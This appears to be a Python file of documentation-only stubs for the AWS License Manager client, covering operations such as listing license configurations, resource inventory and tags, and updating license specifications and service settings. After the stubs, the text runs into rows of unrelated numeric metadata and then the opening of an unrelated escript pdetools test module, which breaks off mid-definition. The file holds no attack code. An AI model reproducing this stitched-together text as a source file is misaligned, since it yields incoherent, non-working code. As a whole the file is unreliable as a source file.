def list_failures_for_license_configuration_operations(LicenseConfigurationArn=None, MaxResults=None, NextToken=None):
    """
    Lists the license configuration operations that failed.

    See also: AWS API Documentation

    :type LicenseConfigurationArn: string
    :param LicenseConfigurationArn: [REQUIRED] Amazon Resource Name of the
        license configuration.
    :type MaxResults: integer
    :param MaxResults: Maximum number of results to return in a single call.
    :type NextToken: string
    :param NextToken: Token for the next set of results.
    :rtype: dict
    :return: A dict with keys:

        - LicenseOperationFailureList (list of dict): each failure has
          'ResourceArn' (string), 'ResourceType'
          ('EC2_INSTANCE'|'EC2_HOST'|'EC2_AMI'|'RDS'|'SYSTEMS_MANAGER_MANAGED_INSTANCE'),
          'ErrorMessage' (string), 'FailureTime' (datetime),
          'OperationName' (string), 'ResourceOwnerId' (string -- ID of the
          AWS account that owns the resource), 'OperationRequestedBy'
          (string -- the requester is "License Manager Automated Discovery"),
          and 'MetadataList' (reserved; list of dicts with 'Name' and
          'Value', both reserved).
        - NextToken (string): token for the next set of results.

    Raises:
        LicenseManager.Client.exceptions.InvalidParameterValueException
        LicenseManager.Client.exceptions.ServerInternalException
        LicenseManager.Client.exceptions.AuthorizationException
        LicenseManager.Client.exceptions.AccessDeniedException
        LicenseManager.Client.exceptions.RateLimitExceededException
    """
    # Documentation stub only; the real call is dispatched by botocore at runtime.
    return None
def list_license_configurations(LicenseConfigurationArns=None, MaxResults=None, NextToken=None, Filters=None):
    """
    Lists the license configurations for your account.

    See also: AWS API Documentation

    :type LicenseConfigurationArns: list
    :param LicenseConfigurationArns: Amazon Resource Names (ARN) of the
        license configurations. (list of string)
    :type MaxResults: integer
    :param MaxResults: Maximum number of results to return in a single call.
    :type NextToken: string
    :param NextToken: Token for the next set of results.
    :type Filters: list
    :param Filters: Filters to scope the results. Each filter is a dict with
        'Name' (string -- name of the filter; filter names are
        case-sensitive) and 'Values' (list of string -- filter values;
        case-sensitive). Supported filters and logical operators:

        - licenseCountingType - The dimension on which licenses are counted
          (vCPU). Logical operators are EQUALS | NOT_EQUALS.
        - enforceLicenseCount - A Boolean value that indicates whether hard
          license enforcement is used. Logical operators are
          EQUALS | NOT_EQUALS.
        - usagelimitExceeded - A Boolean value that indicates whether the
          available licenses have been exceeded. Logical operators are
          EQUALS | NOT_EQUALS.
    :rtype: dict
    :return: A dict with keys:

        - LicenseConfigurations (list of dict): each entry describes one
          license configuration (an abstraction of a customer license
          agreement that can be consumed and enforced by License Manager)
          with keys: 'LicenseConfigurationId', 'LicenseConfigurationArn',
          'Name', 'Description',
          'LicenseCountingType' ('vCPU'|'Instance'|'Core'|'Socket'),
          'LicenseRules' (list of string), 'LicenseCount' (integer),
          'LicenseCountHardLimit' (boolean), 'ConsumedLicenses' (integer),
          'Status', 'OwnerAccountId',
          'ConsumedLicenseSummaryList' (dicts of 'ResourceType'
          ('EC2_INSTANCE'|'EC2_HOST'|'EC2_AMI'|'RDS'|'SYSTEMS_MANAGER_MANAGED_INSTANCE')
          and 'ConsumedLicenses'),
          'ManagedResourceSummaryList' (dicts of 'ResourceType' and
          'AssociationCount'),
          'ProductInformationList' (dicts of 'ResourceType' -- the value is
          SSM_MANAGED -- and 'ProductInformationFilterList': dicts of
          'ProductInformationFilterName', 'ProductInformationFilterValue'
          (list of string), 'ProductInformationFilterComparator'; supported
          filters with logical operator EQUALS: Application Name,
          Application Publisher, Application Version, Platform Name,
          Platform Type; License Included supports EQUALS and NOT_EQUALS
          with possible values sql-server-enterprise | sql-server-standard |
          sql-server-web | windows-server-datacenter), and
          'AutomatedDiscoveryInformation' ({'LastRunTime': datetime}).
        - NextToken (string): token for the next set of results.

    Raises:
        LicenseManager.Client.exceptions.InvalidParameterValueException
        LicenseManager.Client.exceptions.ServerInternalException
        LicenseManager.Client.exceptions.FilterLimitExceededException
        LicenseManager.Client.exceptions.AuthorizationException
        LicenseManager.Client.exceptions.AccessDeniedException
        LicenseManager.Client.exceptions.RateLimitExceededException
    """
    # Documentation stub only; the real call is dispatched by botocore at runtime.
    return None
def list_license_specifications_for_resource(ResourceArn=None, MaxResults=None, NextToken=None):
    """
    Describes the license configurations for the specified resource.

    See also: AWS API Documentation

    :type ResourceArn: string
    :param ResourceArn: [REQUIRED] Amazon Resource Name (ARN) of a resource
        that has an associated license configuration.
    :type MaxResults: integer
    :param MaxResults: Maximum number of results to return in a single call.
    :type NextToken: string
    :param NextToken: Token for the next set of results.
    :rtype: dict
    :return: A dict with keys:

        - LicenseSpecifications (list of dict): license configurations
          associated with a resource; each specification has
          'LicenseConfigurationArn' (string -- ARN of the license
          configuration).
        - NextToken (string): token for the next set of results.

    Raises:
        LicenseManager.Client.exceptions.InvalidParameterValueException
        LicenseManager.Client.exceptions.ServerInternalException
        LicenseManager.Client.exceptions.AuthorizationException
        LicenseManager.Client.exceptions.AccessDeniedException
        LicenseManager.Client.exceptions.RateLimitExceededException
    """
    # Documentation stub only; the real call is dispatched by botocore at runtime.
    return None
def list_resource_inventory(MaxResults=None, NextToken=None, Filters=None):
    """
    Lists resources managed using Systems Manager inventory.

    See also: AWS API Documentation

    :type MaxResults: integer
    :param MaxResults: Maximum number of results to return in a single call.
    :type NextToken: string
    :param NextToken: Token for the next set of results.
    :type Filters: list
    :param Filters: Filters to scope the results. Each filter is a dict with
        'Name' (string, REQUIRED), 'Condition' (string, REQUIRED --
        'EQUALS'|'NOT_EQUALS'|'BEGINS_WITH'|'CONTAINS'), and 'Value'
        (string). Supported filters and logical operators:

        - account_id - The ID of the AWS account that owns the resource.
          Logical operators are EQUALS | NOT_EQUALS.
        - application_name - The name of the application. Logical operators
          are EQUALS | BEGINS_WITH.
        - license_included - The type of license included. Logical operators
          are EQUALS | NOT_EQUALS. Possible values are
          sql-server-enterprise | sql-server-standard | sql-server-web |
          windows-server-datacenter.
        - platform - The platform of the resource. Logical operators are
          EQUALS | BEGINS_WITH.
        - resource_id - The ID of the resource. Logical operators are
          EQUALS | NOT_EQUALS.
    :rtype: dict
    :return: A dict with keys:

        - ResourceInventoryList (list of dict): each resource has
          'ResourceId' (string), 'ResourceType'
          ('EC2_INSTANCE'|'EC2_HOST'|'EC2_AMI'|'RDS'|'SYSTEMS_MANAGER_MANAGED_INSTANCE'),
          'ResourceArn' (string), 'Platform' (string), 'PlatformVersion'
          (string -- platform version of the resource in the inventory), and
          'ResourceOwningAccountId' (string -- ID of the account that owns
          the resource).
        - NextToken (string): token for the next set of results.

    Raises:
        LicenseManager.Client.exceptions.InvalidParameterValueException
        LicenseManager.Client.exceptions.ServerInternalException
        LicenseManager.Client.exceptions.FilterLimitExceededException
        LicenseManager.Client.exceptions.FailedDependencyException
        LicenseManager.Client.exceptions.AuthorizationException
        LicenseManager.Client.exceptions.AccessDeniedException
        LicenseManager.Client.exceptions.RateLimitExceededException
    """
    # Documentation stub only; the real call is dispatched by botocore at runtime.
    return None
def list_tags_for_resource(ResourceArn=None):
    """
    Lists the tags for the specified license configuration.

    See also: AWS API Documentation

    :type ResourceArn: string
    :param ResourceArn: [REQUIRED] Amazon Resource Name (ARN) of the
        license configuration.
    :rtype: dict
    :return: A dict with key:

        - Tags (list of dict): information about the tags; each tag has
          'Key' (string -- tag key) and 'Value' (string -- tag value).

    Raises:
        LicenseManager.Client.exceptions.InvalidParameterValueException
        LicenseManager.Client.exceptions.ServerInternalException
        LicenseManager.Client.exceptions.AuthorizationException
        LicenseManager.Client.exceptions.AccessDeniedException
        LicenseManager.Client.exceptions.RateLimitExceededException
    """
    # Documentation stub only; the real call is dispatched by botocore at runtime.
    return None
def list_usage_for_license_configuration(LicenseConfigurationArn=None, MaxResults=None, NextToken=None, Filters=None):
    """
    Lists all license usage records for a license configuration, displaying
    license consumption details by resource at a selected point in time.
    Use this action to audit the current license consumption for any license
    inventory and configuration.

    See also: AWS API Documentation

    :type LicenseConfigurationArn: string
    :param LicenseConfigurationArn: [REQUIRED] Amazon Resource Name (ARN)
        of the license configuration.
    :type MaxResults: integer
    :param MaxResults: Maximum number of results to return in a single call.
    :type NextToken: string
    :param NextToken: Token for the next set of results.
    :type Filters: list
    :param Filters: Filters to scope the results. Each filter is a dict with
        'Name' (string -- name of the filter; filter names are
        case-sensitive) and 'Values' (list of string -- filter values;
        case-sensitive). Supported filters and logical operators:

        - resourceArn - The ARN of the license configuration resource.
          Logical operators are EQUALS | NOT_EQUALS.
        - resourceType - The resource type (EC2_INSTANCE | EC2_HOST |
          EC2_AMI | SYSTEMS_MANAGER_MANAGED_INSTANCE). Logical operators
          are EQUALS | NOT_EQUALS.
        - resourceAccount - The ID of the account that owns the resource.
          Logical operators are EQUALS | NOT_EQUALS.
    :rtype: dict
    :return: A dict with keys:

        - LicenseConfigurationUsageList (list of dict): usage details per
          resource associated with the license configuration; each entry has
          'ResourceArn' (string), 'ResourceType'
          ('EC2_INSTANCE'|'EC2_HOST'|'EC2_AMI'|'RDS'|'SYSTEMS_MANAGER_MANAGED_INSTANCE'),
          'ResourceStatus' (string), 'ResourceOwnerId' (string -- ID of the
          account that owns the resource), 'AssociationTime' (datetime --
          time when the license configuration was initially associated with
          the resource), and 'ConsumedLicenses' (integer -- number of
          licenses consumed by the resource).
        - NextToken (string): token for the next set of results.

    Raises:
        LicenseManager.Client.exceptions.InvalidParameterValueException
        LicenseManager.Client.exceptions.FilterLimitExceededException
        LicenseManager.Client.exceptions.ServerInternalException
        LicenseManager.Client.exceptions.AuthorizationException
        LicenseManager.Client.exceptions.AccessDeniedException
        LicenseManager.Client.exceptions.RateLimitExceededException
    """
    # Documentation stub only; the real call is dispatched by botocore at runtime.
    return None
def tag_resource(ResourceArn=None, Tags=None):
    """
    Adds the specified tags to the specified license configuration.
    See also: AWS API Documentation
    Exceptions
    :example: response = client.tag_resource(
    ResourceArn='string',
    Tags=[
    {
    'Key': 'string',
    'Value': 'string'
    },
    ]
    )
    :type ResourceArn: string
    :param ResourceArn: [REQUIRED]\nAmazon Resource Name (ARN) of the license configuration.\n
    :type Tags: list
    :param Tags: [REQUIRED]\nOne or more tags.\n\n(dict) --Details about a tag for a license configuration.\n\nKey (string) --Tag key.\n\nValue (string) --Tag value.\n\n\n\n\n
    :rtype: dict
    ReturnsResponse Syntax
    {}
    Response Structure
    (dict) --
    Exceptions
    LicenseManager.Client.exceptions.InvalidParameterValueException
    LicenseManager.Client.exceptions.ServerInternalException
    LicenseManager.Client.exceptions.AuthorizationException
    LicenseManager.Client.exceptions.AccessDeniedException
    LicenseManager.Client.exceptions.RateLimitExceededException
    :return: {}
    :returns:
    (dict) --
    """
    # Documentation-only stub: the concrete client method is generated by
    # botocore at runtime from the AWS License Manager service model.
    pass
def untag_resource(ResourceArn=None, TagKeys=None):
    """
    Removes the specified tags from the specified license configuration.
    See also: AWS API Documentation
    Exceptions
    :example: response = client.untag_resource(
    ResourceArn='string',
    TagKeys=[
    'string',
    ]
    )
    :type ResourceArn: string
    :param ResourceArn: [REQUIRED]\nAmazon Resource Name (ARN) of the license configuration.\n
    :type TagKeys: list
    :param TagKeys: [REQUIRED]\nKeys identifying the tags to remove.\n\n(string) --\n\n
    :rtype: dict
    ReturnsResponse Syntax
    {}
    Response Structure
    (dict) --
    Exceptions
    LicenseManager.Client.exceptions.InvalidParameterValueException
    LicenseManager.Client.exceptions.ServerInternalException
    LicenseManager.Client.exceptions.AuthorizationException
    LicenseManager.Client.exceptions.AccessDeniedException
    LicenseManager.Client.exceptions.RateLimitExceededException
    :return: {}
    :returns:
    (dict) --
    """
    # Documentation-only stub: the concrete client method is generated by
    # botocore at runtime from the AWS License Manager service model.
    pass
def update_license_configuration(LicenseConfigurationArn=None, LicenseConfigurationStatus=None, LicenseRules=None, LicenseCount=None, LicenseCountHardLimit=None, Name=None, Description=None, ProductInformationList=None):
    """
    Modifies the attributes of an existing license configuration.
    A license configuration is an abstraction of a customer license agreement that can be consumed and enforced by License Manager. Components include specifications for the license type (licensing by instance, socket, CPU, or vCPU), allowed tenancy (shared tenancy, Dedicated Instance, Dedicated Host, or all of these), host affinity (how long a VM must be associated with a host), and the number of licenses purchased and used.
    See also: AWS API Documentation
    Exceptions
    :example: response = client.update_license_configuration(
    LicenseConfigurationArn='string',
    LicenseConfigurationStatus='AVAILABLE'|'DISABLED',
    LicenseRules=[
    'string',
    ],
    LicenseCount=123,
    LicenseCountHardLimit=True|False,
    Name='string',
    Description='string',
    ProductInformationList=[
    {
    'ResourceType': 'string',
    'ProductInformationFilterList': [
    {
    'ProductInformationFilterName': 'string',
    'ProductInformationFilterValue': [
    'string',
    ],
    'ProductInformationFilterComparator': 'string'
    },
    ]
    },
    ]
    )
    :type LicenseConfigurationArn: string
    :param LicenseConfigurationArn: [REQUIRED]\nAmazon Resource Name (ARN) of the license configuration.\n
    :type LicenseConfigurationStatus: string
    :param LicenseConfigurationStatus: New status of the license configuration.
    :type LicenseRules: list
    :param LicenseRules: New license rules.\n\n(string) --\n\n
    :type LicenseCount: integer
    :param LicenseCount: New number of licenses managed by the license configuration.
    :type LicenseCountHardLimit: boolean
    :param LicenseCountHardLimit: New hard limit of the number of available licenses.
    :type Name: string
    :param Name: New name of the license configuration.
    :type Description: string
    :param Description: New description of the license configuration.
    :type ProductInformationList: list
    :param ProductInformationList: New product information.\n\n(dict) --Describes product information for a license configuration.\n\nResourceType (string) -- [REQUIRED]Resource type. The value is SSM_MANAGED .\n\nProductInformationFilterList (list) -- [REQUIRED]Product information filters. The following filters and logical operators are supported:\n\nApplication Name - The name of the application. Logical operator is EQUALS .\nApplication Publisher - The publisher of the application. Logical operator is EQUALS .\nApplication Version - The version of the application. Logical operator is EQUALS .\nPlatform Name - The name of the platform. Logical operator is EQUALS .\nPlatform Type - The platform type. Logical operator is EQUALS .\nLicense Included - The type of license included. Logical operators are EQUALS and NOT_EQUALS . Possible values are sql-server-enterprise | sql-server-standard | sql-server-web | windows-server-datacenter .\n\n\n(dict) --Describes product information filters.\n\nProductInformationFilterName (string) -- [REQUIRED]Filter name.\n\nProductInformationFilterValue (list) -- [REQUIRED]Filter value.\n\n(string) --\n\n\nProductInformationFilterComparator (string) -- [REQUIRED]Logical operator.\n\n\n\n\n\n\n\n\n
    :rtype: dict
    ReturnsResponse Syntax
    {}
    Response Structure
    (dict) --
    Exceptions
    LicenseManager.Client.exceptions.InvalidParameterValueException
    LicenseManager.Client.exceptions.ServerInternalException
    LicenseManager.Client.exceptions.AuthorizationException
    LicenseManager.Client.exceptions.AccessDeniedException
    LicenseManager.Client.exceptions.RateLimitExceededException
    :return: {}
    :returns:
    (dict) --
    """
    # Documentation-only stub: the concrete client method is generated by
    # botocore at runtime from the AWS License Manager service model.
    pass
def update_license_specifications_for_resource(ResourceArn=None, AddLicenseSpecifications=None, RemoveLicenseSpecifications=None):
    """
    Adds or removes the specified license configurations for the specified AWS resource.
    You can update the license specifications of AMIs, instances, and hosts. You cannot update the license specifications for launch templates and AWS CloudFormation templates, as they send license configurations to the operation that creates the resource.
    See also: AWS API Documentation
    Exceptions
    :example: response = client.update_license_specifications_for_resource(
    ResourceArn='string',
    AddLicenseSpecifications=[
    {
    'LicenseConfigurationArn': 'string'
    },
    ],
    RemoveLicenseSpecifications=[
    {
    'LicenseConfigurationArn': 'string'
    },
    ]
    )
    :type ResourceArn: string
    :param ResourceArn: [REQUIRED]\nAmazon Resource Name (ARN) of the AWS resource.\n
    :type AddLicenseSpecifications: list
    :param AddLicenseSpecifications: ARNs of the license configurations to add.\n\n(dict) --Details for associating a license configuration with a resource.\n\nLicenseConfigurationArn (string) -- [REQUIRED]Amazon Resource Name (ARN) of the license configuration.\n\n\n\n\n
    :type RemoveLicenseSpecifications: list
    :param RemoveLicenseSpecifications: ARNs of the license configurations to remove.\n\n(dict) --Details for associating a license configuration with a resource.\n\nLicenseConfigurationArn (string) -- [REQUIRED]Amazon Resource Name (ARN) of the license configuration.\n\n\n\n\n
    :rtype: dict
    ReturnsResponse Syntax
    {}
    Response Structure
    (dict) --
    Exceptions
    LicenseManager.Client.exceptions.InvalidParameterValueException
    LicenseManager.Client.exceptions.InvalidResourceStateException
    LicenseManager.Client.exceptions.LicenseUsageException
    LicenseManager.Client.exceptions.ServerInternalException
    LicenseManager.Client.exceptions.AuthorizationException
    LicenseManager.Client.exceptions.AccessDeniedException
    LicenseManager.Client.exceptions.RateLimitExceededException
    :return: {}
    :returns:
    (dict) --
    """
    # Documentation-only stub: the concrete client method is generated by
    # botocore at runtime from the AWS License Manager service model.
    pass
def update_service_settings(S3BucketArn=None, SnsTopicArn=None, OrganizationConfiguration=None, EnableCrossAccountsDiscovery=None):
    """
    Updates License Manager settings for the current Region.
    See also: AWS API Documentation
    Exceptions
    :example: response = client.update_service_settings(
    S3BucketArn='string',
    SnsTopicArn='string',
    OrganizationConfiguration={
    'EnableIntegration': True|False
    },
    EnableCrossAccountsDiscovery=True|False
    )
    :type S3BucketArn: string
    :param S3BucketArn: Amazon Resource Name (ARN) of the Amazon S3 bucket where the License Manager information is stored.
    :type SnsTopicArn: string
    :param SnsTopicArn: Amazon Resource Name (ARN) of the Amazon SNS topic used for License Manager alerts.
    :type OrganizationConfiguration: dict
    :param OrganizationConfiguration: Enables integration with AWS Organizations for cross-account discovery.\n\nEnableIntegration (boolean) -- [REQUIRED]Enables AWS Organization integration.\n\n\n
    :type EnableCrossAccountsDiscovery: boolean
    :param EnableCrossAccountsDiscovery: Activates cross-account discovery.
    :rtype: dict
    ReturnsResponse Syntax
    {}
    Response Structure
    (dict) --
    Exceptions
    LicenseManager.Client.exceptions.InvalidParameterValueException
    LicenseManager.Client.exceptions.ServerInternalException
    LicenseManager.Client.exceptions.AuthorizationException
    LicenseManager.Client.exceptions.AccessDeniedException
    LicenseManager.Client.exceptions.RateLimitExceededException
    :return: {}
    :returns:
    (dict) --
    """
    # Documentation-only stub: the concrete client method is generated by
    # botocore at runtime from the AWS License Manager service model.
    pass
| 30.858995
| 1,246
| 0.688375
| 5,412
| 57,120
| 7.221729
| 0.095898
| 0.064988
| 0.097482
| 0.01791
| 0.79759
| 0.76658
| 0.740482
| 0.726717
| 0.716662
| 0.697498
| 0
| 0.004693
| 0.227854
| 57,120
| 1,850
| 1,247
| 30.875676
| 0.881465
| 0.956373
| 0
| 0.5
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.5
| false
| 0.5
| 0
| 0
| 0.5
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 9
|
4f3618fc1fbac32786c0dc6f71396e9e55d0e848
| 1,926
|
py
|
Python
|
src/printing/fonts/PSFont_Courier.py
|
vadmium/grailbrowser
|
ca94e6db2359bcb16c0da256771550d1327c6d33
|
[
"CNRI-Python",
"CNRI-Jython"
] | 9
|
2015-03-23T23:21:42.000Z
|
2021-08-01T01:47:22.000Z
|
src/printing/fonts/PSFont_Courier.py
|
vadmium/grailbrowser
|
ca94e6db2359bcb16c0da256771550d1327c6d33
|
[
"CNRI-Python",
"CNRI-Jython"
] | null | null | null |
src/printing/fonts/PSFont_Courier.py
|
vadmium/grailbrowser
|
ca94e6db2359bcb16c0da256771550d1327c6d33
|
[
"CNRI-Python",
"CNRI-Jython"
] | 11
|
2015-03-23T23:22:22.000Z
|
2020-06-08T14:24:17.000Z
|
# Character width information for PostScript font `Courier'
# generated from the Adobe Font Metric file `../../../../adobe/com_____.afm'. Adobe
# copyright notice follows:
#
# Copyright (c) 1989, 1990, 1991 Adobe Systems Incorporated. All rights reserved.
#
from . import PSFont
# Per-character advance widths indexed by Latin-1 character code 0-255
# (AFM widths, in 1/1000-em units).  Courier is monospaced, so every
# encoded glyph has the same width of 600; a 0 entry marks a character
# code with no glyph in this encoding.
font = PSFont.PSFont('Courier', 'Courier',
    # codes 0-31: control characters, no glyphs
    [ 0, 0, 0, 0, 0, 0, 0, 0,
    0, 0, 0, 0, 0, 0, 0, 0,
    0, 0, 0, 0, 0, 0, 0, 0,
    0, 0, 0, 0, 0, 0, 0, 0,
    # codes 32-126: printable ASCII, all 600 wide; 127 (DEL) unencoded
    600, 600, 600, 600, 600, 600, 600, 600,
    600, 600, 600, 600, 600, 600, 600, 600,
    600, 600, 600, 600, 600, 600, 600, 600,
    600, 600, 600, 600, 600, 600, 600, 600,
    600, 600, 600, 600, 600, 600, 600, 600,
    600, 600, 600, 600, 600, 600, 600, 600,
    600, 600, 600, 600, 600, 600, 600, 600,
    600, 600, 600, 600, 600, 600, 600, 600,
    600, 600, 600, 600, 600, 600, 600, 600,
    600, 600, 600, 600, 600, 600, 600, 600,
    600, 600, 600, 600, 600, 600, 600, 600,
    600, 600, 600, 600, 600, 600, 600, 0,
    # codes 128-159: unencoded in the Adobe standard encoding
    0, 0, 0, 0, 0, 0, 0, 0,
    0, 0, 0, 0, 0, 0, 0, 0,
    0, 0, 0, 0, 0, 0, 0, 0,
    0, 0, 0, 0, 0, 0, 0, 0,
    # codes 160-255: upper Latin-1 range; only positions with glyphs are 600
    0, 600, 600, 600, 600, 600, 600, 600,
    600, 600, 600, 600, 600, 600, 600, 600,
    0, 600, 600, 600, 600, 0, 600, 600,
    600, 600, 600, 600, 600, 600, 0, 600,
    0, 600, 600, 600, 600, 600, 600, 600,
    600, 0, 600, 600, 0, 600, 600, 600,
    600, 0, 0, 0, 0, 0, 0, 0,
    0, 0, 0, 0, 0, 0, 0, 0,
    0, 600, 0, 600, 0, 0, 0, 0,
    600, 600, 600, 600, 0, 0, 0, 0,
    0, 600, 0, 0, 0, 600, 0, 0,
    600, 600, 600, 600, 0, 0, 0, 0,
    ])
| 45.857143
| 84
| 0.410177
| 296
| 1,926
| 2.652027
| 0.10473
| 1.031847
| 1.444586
| 1.803822
| 0.705732
| 0.701911
| 0.695541
| 0.689172
| 0.686624
| 0.682803
| 0
| 0.51879
| 0.433541
| 1,926
| 41
| 85
| 46.97561
| 0.200733
| 0.127726
| 0
| 0.685714
| 1
| 0
| 0.008368
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.028571
| 0
| 0.028571
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
4f550d9e2070e56ce20852e02ea1c388c883935c
| 817
|
py
|
Python
|
vimfiles/globals/.ycm_extra_conf.py
|
jurek333/WinVimConfig
|
2e3859fe907447f151c0c71e1550664fff88bc21
|
[
"MIT"
] | null | null | null |
vimfiles/globals/.ycm_extra_conf.py
|
jurek333/WinVimConfig
|
2e3859fe907447f151c0c71e1550664fff88bc21
|
[
"MIT"
] | null | null | null |
vimfiles/globals/.ycm_extra_conf.py
|
jurek333/WinVimConfig
|
2e3859fe907447f151c0c71e1550664fff88bc21
|
[
"MIT"
] | null | null | null |
def FlagsForFile(filename, **kwargs):
    """YouCompleteMe extra-conf hook: return the clang flags for *filename*.

    Every file is parsed as C++14 with strict warnings, against the MSVC
    2017 toolchain and Windows 10 SDK include directories.
    """
    # Base compiler options, applied to every translation unit.
    flags = ['-x', 'c++', '-std=c++14', '-Wall', '-Wextra', '-Werror']
    # Fixed system include paths for the installed MSVC / Windows Kits.
    include_dirs = (
        'C:/Program Files (x86)/Microsoft Visual Studio/2017/Community/VC/Tools/MSVC/14.13.26128/include',
        'C:/Program Files (x86)/Microsoft Visual Studio/2017/Community/VC/Tools/MSVC/14.13.26128/atlmfc/include',
        'C:/Program Files (x86)/Microsoft Visual Studio/2017/Community/VC/Auxiliary/VS/include',
        'C:/Program Files (x86)/Windows Kits/10/Include/10.0.16299.0/ucrt',
        'C:/Program Files (x86)/Windows Kits/10/Include/10.0.16299.0/um',
        'C:/Program Files (x86)/Windows Kits/10/Include/10.0.16299.0/shared',
        'C:/Program Files (x86)/Windows Kits/10/Include/10.0.16299.0/winrt',
        'C:/Program Files (x86)/Windows Kits/NETFXSDK/4.6.1/Include/um',
    )
    for directory in include_dirs:
        flags.append('-I')
        flags.append(directory)
    return {'flags': flags}
| 62.846154
| 113
| 0.668299
| 132
| 817
| 4.136364
| 0.333333
| 0.029304
| 0.131868
| 0.205128
| 0.783883
| 0.783883
| 0.771062
| 0.71978
| 0.71978
| 0.71978
| 0
| 0.128205
| 0.093023
| 817
| 12
| 114
| 68.083333
| 0.608637
| 0
| 0
| 0
| 0
| 0.666667
| 0.801714
| 0.397797
| 0
| 0
| 0
| 0
| 0
| 1
| 0.083333
| false
| 0
| 0
| 0.083333
| 0.166667
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
4f8df0e1a5c5d1cdbe6506fce2eaf8ce245ec8c1
| 383
|
py
|
Python
|
test/optest/tfunits/ArgMinTest.py
|
ishine/MAI
|
64753cd2f59af2949896937c2e5dbfc4d8bab1e0
|
[
"Apache-2.0"
] | null | null | null |
test/optest/tfunits/ArgMinTest.py
|
ishine/MAI
|
64753cd2f59af2949896937c2e5dbfc4d8bab1e0
|
[
"Apache-2.0"
] | null | null | null |
test/optest/tfunits/ArgMinTest.py
|
ishine/MAI
|
64753cd2f59af2949896937c2e5dbfc4d8bab1e0
|
[
"Apache-2.0"
] | null | null | null |
import tensorflow as tf

# Smoke test for tf.argmin: evaluate argmin of a 2x2 matrix along both axes.
# NOTE(review): this uses the TensorFlow 1.x API (InteractiveSession / .eval()).
sess = tf.InteractiveSession()

# argmin along axis 0 (per column) of [[2, 1], [3, 4]] -> expected [0, 0].
t1 = tf.constant([2., 1., 3, 4], dtype=tf.float32)
t2 = tf.constant(0, dtype=tf.int32)
t1 = tf.reshape(t1, [2, 2]).eval()
target = tf.argmin(t1, t2).eval()
# Bug fix: `print target` is Python-2-only syntax (SyntaxError on Python 3);
# use the print() function, which behaves identically on both.
print(target)

# argmin along axis 1 (per row) of the same matrix -> expected [1, 0].
t1 = tf.constant([2., 1., 3, 4], dtype=tf.float32)
t2 = tf.constant(1, dtype=tf.int32)
t1 = tf.reshape(t1, [2, 2]).eval()
target = tf.argmin(t1, t2).eval()
print(target)
| 18.238095
| 47
| 0.673629
| 71
| 383
| 3.633803
| 0.309859
| 0.062016
| 0.093023
| 0.100775
| 0.821705
| 0.821705
| 0.821705
| 0.821705
| 0.821705
| 0.821705
| 0
| 0.099415
| 0.10705
| 383
| 20
| 48
| 19.15
| 0.654971
| 0
| 0
| 0.666667
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | null | 0
| 0.083333
| null | null | 0.166667
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
96d72678969ba0a57547b62e79c71da701c9f11e
| 66,828
|
py
|
Python
|
escriptcore/test/python/test_pdetools.py
|
markendr/esys-escript.github.io
|
0023eab09cd71f830ab098cb3a468e6139191e8d
|
[
"Apache-2.0"
] | null | null | null |
escriptcore/test/python/test_pdetools.py
|
markendr/esys-escript.github.io
|
0023eab09cd71f830ab098cb3a468e6139191e8d
|
[
"Apache-2.0"
] | 1
|
2019-01-14T03:07:43.000Z
|
2019-01-14T03:07:43.000Z
|
escriptcore/test/python/test_pdetools.py
|
markendr/esys-escript.github.io
|
0023eab09cd71f830ab098cb3a468e6139191e8d
|
[
"Apache-2.0"
] | null | null | null |
##############################################################################
#
# Copyright (c) 2003-2018 by The University of Queensland
# http://www.uq.edu.au
#
# Primary Business: Queensland, Australia
# Licensed under the Apache License, version 2.0
# http://www.apache.org/licenses/LICENSE-2.0
#
# Development until 2012 by Earth Systems Science Computational Center (ESSCC)
# Development 2012-2013 by School of Earth Sciences
# Development from 2014 by Centre for Geoscience Computing (GeoComp)
#
##############################################################################
from __future__ import print_function, division
__copyright__="""Copyright (c) 2003-2018 by The University of Queensland
http://www.uq.edu.au
Primary Business: Queensland, Australia"""
__license__="""Licensed under the Apache License, version 2.0
http://www.apache.org/licenses/LICENSE-2.0"""
__url__="https://launchpad.net/escript-finley"
"""
Test suite for the pdetools module
The tests must be linked with a Domain class object in the setUp method:
from esys.dudley import Rectangle
class Test_LinearPDEOnDudley(Test_LinearPDE):
RES_TOL=1.e-8
def setUp(self):
self.domain = Rectangle(10,10,2)
def tearDown(self):
del self.domain
suite = unittest.TestSuite()
suite.addTest(unittest.makeSuite(Test_LinearPDEOnDudley))
unittest.TextTestRunner(verbosity=2).run(suite)
:var __author__: name of author
:var __copyright__: copyrights
:var __license__: licence agreement
:var __url__: url entry point on documentation
:var __version__: version
:var __date__: date of the version
"""
__author__="Lutz Gross, l.gross@uq.edu.au"
import esys.escriptcore.utestselect as unittest
import numpy
from esys.escript import *
from esys.escript.pdetools import Locator,Projector,TimeIntegrationManager,NoPDE,PCG, ArithmeticTuple, GMRES, MINRES, TFQMR, HomogeneousSaddlePointProblem
from esys.escript.pdetools import Defect, NewtonGMRES
from numpy.linalg import solve as solve_linear_equations
class Test_pdetools_noLumping(unittest.TestCase):
